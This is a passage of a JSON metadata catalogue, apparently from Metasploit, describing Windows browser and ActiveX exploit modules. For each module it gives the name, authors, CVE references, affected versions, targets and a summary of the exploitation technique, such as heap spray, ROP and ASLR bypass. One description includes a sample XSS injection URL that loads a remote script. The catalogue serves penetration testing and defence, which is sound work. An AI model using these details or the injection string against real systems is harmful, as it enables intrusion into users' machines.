"description": "This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\n where user provided data is used as a memory pointer. This module has been tested\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\n 11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is\n used. This one is installed with HP LoadRunner.",
"references": [
"CVE-2013-2370",
"OSVDB-95640",
"BID-61441",
"ZDI-13-182",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_writefilebinary",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_writefilestring": {
"name": "HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",
"full_name": "exploit/windows/browser/hp_loadrunner_writefilestring",
"rank": 300,
"disclosure_date": "2013-07-24",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileString method,\n which allow the user to write arbitrary files. It's abused to drop a payload\n embedded in a dll, which is later loaded through the Init() method from the\n lrMdrvService control, by abusing an insecure LoadLibrary call. This module has\n been tested successfully on IE8 on Windows XP. Virtualization based on the Low\n Integrity Process, on Windows Vista and 7, will stop this module because the DLL\n will be dropped to a virtualized folder, which isn't used by LoadLibrary.",
"references": [
"CVE-2013-4798",
"OSVDB-95642",
"BID-61443",
"ZDI-13-207",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic IE on Windows XP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_writefilestring",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hpmqc_progcolor": {
"name": "HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",
"full_name": "exploit/windows/browser/hpmqc_progcolor",
"rank": 300,
"disclosure_date": "2007-04-04",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in SPIDERLib.Loader\n ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)\n for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and\n 8.2 SP1 before Patch 32.\n By setting an overly long value to 'ProgColor', an attacker can overrun\n a buffer and execute arbitrary code.",
"references": [
"CVE-2007-1819",
"OSVDB-34317",
"BID-23239",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/hpmqc_progcolor.rb",
"is_install_path": true,
"ref_name": "windows/browser/hpmqc_progcolor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hyleos_chemviewx_activex": {
"name": "Hyleos ChemView ActiveX Control Stack Buffer Overflow",
"full_name": "exploit/windows/browser/hyleos_chemviewx_activex",
"rank": 400,
"disclosure_date": "2010-02-10",
"type": "exploit",
"author": [
"Paul Craig <paul.craig@security-assessment.com>",
"Dz_attacker <dz_attacker@hotmail.fr>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos\n ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods\n with an overly long first argument, an attacker can overrun a buffer and execute\n arbitrary code.",
"references": [
"CVE-2010-0679",
"OSVDB-62276",
"URL-http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf",
"EDB-11422"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/hyleos_chemviewx_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibm_spss_c1sizer": {
"name": "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",
"full_name": "exploit/windows/browser/ibm_spss_c1sizer",
"rank": 300,
"disclosure_date": "2013-04-26",
"type": "exploit",
"author": [
"Alexander Gavrun",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap based buffer overflow in the C1Tab ActiveX control,\n while handling the TabCaption property. The affected control can be found in the\n c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has\n been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7\n SP1.",
"references": [
"CVE-2012-5946",
"OSVDB-92845",
"BID-59559",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21635476",
"ZDI-13-100"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibm_spss_c1sizer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibm_spss_c1sizer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibm_tivoli_pme_activex_bof": {
"name": "IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",
"full_name": "exploit/windows/browser/ibm_tivoli_pme_activex_bof",
"rank": 300,
"disclosure_date": "2012-03-01",
"type": "exploit",
"author": [
"Andrea Micalizzi aka rgod",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in the\n Isig.isigCtl.1 ActiveX installed with IBM Tivoli Provisioning\n Manager Express for Software Distribution 4.1.1.\n\n The vulnerability is found in the \"RunAndUploadFile\" method\n where the \"OtherFields\" parameter with user controlled data\n is used to build a \"Content-Disposition\" header and attach\n contents in an insecure way which allows to overflow a buffer\n in the stack.",
"references": [
"CVE-2012-0198",
"OSVDB-79735",
"BID-52252",
"ZDI-12-040"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibm_tivoli_pme_activex_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibmegath_getxmlvalue": {
"name": "IBM Access Support ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ibmegath_getxmlvalue",
"rank": 300,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in IBM Access Support. When\n sending an overly long string to the GetXMLValue() method of IbmEgath.dll\n (3.20.284.0) an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-0215",
"OSVDB-52958",
"BID-34228"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibmegath_getxmlvalue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibmlotusdomino_dwa_uploadmodule": {
"name": "IBM Lotus Domino Web Access Upload Module Buffer Overflow",
"full_name": "exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule",
"rank": 300,
"disclosure_date": "2007-12-20",
"type": "exploit",
"author": [
"Elazar Broad <elazarb@earthlink.net>"
],
"description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module.\n By sending an overly long string to the \"General_ServerName()\" property located\n in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-4474",
"OSVDB-40954",
"BID-26972",
"EDB-4820"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibmlotusdomino_dwa_uploadmodule",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_cbutton_uaf": {
"name": "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
"full_name": "exploit/windows/browser/ie_cbutton_uaf",
"rank": 300,
"disclosure_date": "2012-12-27",
"type": "exploit",
"author": [
"eromang",
"mahmud ab rahman",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"Peter Vreugdenhil"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CButton object is freed, but a reference\n is kept and used again during a page reload, an invalid memory that's controllable\n is used, and allows arbitrary code execution under the context of the user.\n\n Please note: This vulnerability has been exploited in the wild targeting\n mainly China/Taiwan/and US-based computers.",
"references": [
"CVE-2012-4792",
"OSVDB-88774",
"US-CERT-VU-154201",
"BID-57070",
"MSB-MS13-008",
"URL-http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html",
"URL-http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/",
"URL-http://technet.microsoft.com/en-us/security/advisory/2794220",
"URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx",
"URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows Vista",
"IE 8 on Windows Server 2003",
"IE 8 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_cbutton_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_cbutton_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_cgenericelement_uaf": {
"name": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
"full_name": "exploit/windows/browser/ie_cgenericelement_uaf",
"rank": 400,
"disclosure_date": "2013-05-03",
"type": "exploit",
"author": [
"Unknown",
"EMH",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.",
"references": [
"CVE-2013-1347",
"OSVDB-92993",
"MSB-MS13-038",
"US-CERT-VU-237655",
"URL-http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx",
"URL-http://r-7.co/IE8-DOL"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows Vista",
"IE 8 on Windows Server 2003",
"IE 8 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_cgenericelement_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_createobject": {
"name": "MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution",
"full_name": "exploit/windows/browser/ie_createobject",
"rank": 600,
"disclosure_date": "2006-04-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a generic code execution vulnerability in Internet\n Explorer by abusing vulnerable ActiveX objects.",
"references": [
"MSB-MS06-014",
"CVE-2006-0003",
"OSVDB-24517",
"MSB-MS06-073",
"CVE-2006-4704",
"OSVDB-30155"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"MS06-014 - RDS.DataSpace",
"MS06-014 - RDS.DataSpace",
"MS06-073 - WMIScriptUtils.WMIObjectBroker2.1",
"UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1",
"UNKNOWN - SoftwareDistribution.WebControl.1",
"UNKNOWN - VsmIDE.DTE",
"UNKNOWN - DExplore.AppObj.8.0",
"UNKNOWN - VisualStudio.DTE.8.0",
"UNKNOWN - Microsoft.DbgClr.DTE.8.0",
"UNKNOWN - VsaIDE.DTE",
"UNKNOWN - Business Object Factory ",
"UNKNOWN - Outlook Data Object",
"UNKNOWN - Outlook.Application"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_createobject.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_createobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_execcommand_uaf": {
"name": "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
"full_name": "exploit/windows/browser/ie_execcommand_uaf",
"rank": 400,
"disclosure_date": "2012-09-14",
"type": "exploit",
"author": [
"unknown",
"eromang",
"binjo",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When\n rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,\n but the same memory is reused again later in the CMshtmlEd::Exec() function, leading\n to a use-after-free condition.\n\n Please note that this vulnerability has been exploited in the wild since Sep 14 2012.\n\n Also note that presently, this module has some target dependencies for the ROP chain to be\n valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).\n For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which\n is often the case).",
"references": [
"CVE-2012-4969",
"OSVDB-85532",
"MSB-MS12-063",
"URL-http://technet.microsoft.com/en-us/security/advisory/2757760",
"URL-http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ie_execcommand_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_execcommand_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_iscomponentinstalled": {
"name": "Microsoft Internet Explorer isComponentInstalled Overflow",
"full_name": "exploit/windows/browser/ie_iscomponentinstalled",
"rank": 300,
"disclosure_date": "2006-02-24",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in Internet Explorer. This bug was\n patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.",
"references": [
"CVE-2006-1016",
"OSVDB-31647",
"BID-16870"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0 with Internet Explorer 6.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_iscomponentinstalled.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_iscomponentinstalled",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_setmousecapture_uaf": {
"name": "MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free",
"full_name": "exploit/windows/browser/ie_setmousecapture_uaf",
"rank": 300,
"disclosure_date": "2013-09-17",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"Rich Lundeen"
],
"description": "This module exploits a use-after-free vulnerability that currents targets Internet\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\n It was initially found in the wild in Japan, but other regions such as English,\n Chinese, Korean, etc, were targeted as well.\n\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\n reference during an event. An attacker first can setup two elements, where the second\n is the child of the first, and then setup a onlosecapture event handler for the parent\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\n one for the parent element, one for the child. When the setCapture() call for the child\n element is called, it finally triggers the event, which allows the attacker to cause an\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\n memory. The exact size of this memory may differ based on the version of IE. After the\n free, an invalid reference will still be kept and pass on to more functions, eventuall\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\n code execution) when this function attempts to use this reference to call what appears to\n be a PrivateQueryInterface due to the offset (0x00).\n\n To mimic the same exploit found in the wild, this module will try to use the same DLL\n from Microsoft Office 2007 or 2010 to leverage the attack.",
"references": [
"CVE-2013-3893",
"OSVDB-97380",
"MSB-MS13-080",
"URL-http://technet.microsoft.com/en-us/security/advisory/2887505",
"URL-http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 with Office 2007|2010",
"Windows XP with IE 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_setmousecapture_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_unsafe_scripting": {
"name": "Microsoft Internet Explorer Unsafe Scripting Misconfiguration",
"full_name": "exploit/windows/browser/ie_unsafe_scripting",
"rank": 0,
"disclosure_date": "2010-09-20",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This exploit takes advantage of the \"Initialize and script ActiveX controls not\n marked safe for scripting\" setting within Internet Explorer. When this option is set,\n IE allows access to the WScript.Shell ActiveX control, which allows javascript to\n interact with the file system and run commands. This security flaw is not uncommon\n in corporate environments for the 'Intranet' or 'Trusted Site' zones.\n\n When set via domain policy, the most common registry entry to modify is HKLM\\\n Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1201,\n which if set to '0' forces ActiveX controls not marked safe for scripting to be\n enabled for the Intranet zone.\n\n This module creates a javascript/html hybrid that will render correctly either\n via a direct GET http://msf-server/ or as a javascript include, such as in:\n http://intranet-server/xss.asp?id=\"><script%20src=http://10.10.10.10/ie_unsafe_script.js>\n </script>.\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.",
"references": [
"URL-http://support.microsoft.com/kb/182569",
"URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html",
"URL-http://support.microsoft.com/kb/870669"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86/x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_unsafe_scripting.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_unsafe_scripting",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/imgeviewer_tifmergemultifiles": {
"name": "Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",
"full_name": "exploit/windows/browser/imgeviewer_tifmergemultifiles",
"rank": 300,
"disclosure_date": "2010-03-03",
"type": "exploit",
"author": [
"Dr_IDE",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.",
"references": [
"CVE-2010-5193",
"OSVDB-78102",
"EDB-15668",
"URL-http://secunia.com/advisories/42445/",
"URL-http://xforce.iss.net/xforce/xfdb/63666"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6/7",
"Internet Explorer 8 with JRE"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb",
"is_install_path": true,
"ref_name": "windows/browser/imgeviewer_tifmergemultifiles",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/indusoft_issymbol_internationalseparator": {
"name": "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",
"full_name": "exploit/windows/browser/indusoft_issymbol_internationalseparator",
"rank": 300,
"disclosure_date": "2012-04-28",
"type": "exploit",
"author": [
"Alexander Gavrun",
"Dmitriy Pletnev",
"James Fitts <fitts.james@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.",
"references": [
"CVE-2011-0340",
"OSVDB-72865",
"BID-47596",
"ZDI-12-168",
"URL-http://secunia.com/secunia_research/2011-37/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb",
"is_install_path": true,
"ref_name": "windows/browser/indusoft_issymbol_internationalseparator",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/inotes_dwa85w_bof": {
"name": "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/inotes_dwa85w_bof",
"rank": 300,
"disclosure_date": "2012-06-01",
"type": "exploit",
"author": [
"Gaurav Baruah",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.",
"references": [
"CVE-2012-2175",
"OSVDB-82755",
"BID-53879",
"ZDI-12-132",
"URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/inotes_dwa85w_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/inotes_dwa85w_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/intrust_annotatex_add": {
"name": "Quest InTrust Annotation Objects Uninitialized Pointer",
"full_name": "exploit/windows/browser/intrust_annotatex_add",
"rank": 200,
"disclosure_date": "2012-03-28",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. This will take some time in the users browser.",
"references": [
"CVE-2012-5896",
"OSVDB-80662",
"BID-52765",
"EDB-18674"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP/Vista SP0-SP3 (IE6/IE7)",
"Windows XP SP0-SP3 DEP bypass (IE8)",
"Windows 7/Vista ALSR/DEP bypass (IE8)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/intrust_annotatex_add.rb",
"is_install_path": true,
"ref_name": "windows/browser/intrust_annotatex_add",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_basicservice_impl": {
"name": "Sun Java Web Start BasicServiceImpl Code Execution",
"full_name": "exploit/windows/browser/java_basicservice_impl",
"rank": 600,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"Matthias Kaiser",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"",
"references": [
"CVE-2010-3563",
"OSVDB-69043",
"URL-http://mk41ser.blogspot.com"
],
"platform": "Java,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Generic (Java Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/java_basicservice_impl.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_basicservice_impl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/java_cmm": {
"name": "Java CMM Remote Code Execution",
"full_name": "exploit/windows/browser/java_cmm",
"rank": 300,
"disclosure_date": "2013-03-01",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.",
"references": [
"CVE-2013-1493",
"OSVDB-90737",
"BID-58238",
"URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493",
"URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html",
"URL-http://pastie.org/pastes/6581034"
],
"platform": "Java,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
